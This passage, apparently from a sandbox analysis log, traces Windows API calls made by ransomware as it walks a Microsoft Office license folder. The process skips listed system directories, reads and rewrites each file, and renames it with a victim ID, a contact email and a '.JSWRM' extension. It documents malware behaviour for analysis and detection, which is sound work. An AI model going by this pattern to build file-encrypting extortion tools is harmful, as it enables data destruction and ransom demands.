lpString2="perflogs") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0112.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0112.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0112.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0112.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0112.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0112.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0112.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.066] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0112.066] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0112.066] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0112.068] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.068] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0112.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.068] CloseHandle (hObject=0x45c) returned 1 [0112.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0112.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0112.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0112.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0112.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0112.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0112.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.070] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeccd4254, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeccd4254, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecd92def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2590, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_KMS_Client-ul.xrm-ms", cAlternateFileName="VIDE79~1.XRM")) returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned 1 [0112.073] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0112.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0112.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0112.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0112.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0112.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2411c8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0112.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0112.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0112.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.074] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9616) returned 1 [0112.074] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0112.074] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0112.076] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.076] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0112.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.076] CloseHandle (hObject=0x45c) returned 1 [0112.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0112.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0112.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0112.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0112.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0112.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0112.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.077] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0112.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0112.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0112.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0112.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.078] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeccadfe3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeccadfe3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecd6cbe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2987, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_MAK-pl.xrm-ms", cAlternateFileName="VIB60F~1.XRM")) returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="recovery") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.078] lstrcmpiW (lpString1="VisioStdVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0112.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0112.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0112.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0112.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0112.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.079] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10631) returned 1 [0112.079] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0112.079] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0112.081] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.081] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0112.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.082] CloseHandle (hObject=0x45c) returned 1 [0112.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0112.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0112.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0112.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0112.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0112.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0112.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.082] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0112.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0112.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0112.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0112.083] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecc3b8e9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecc3b8e9, 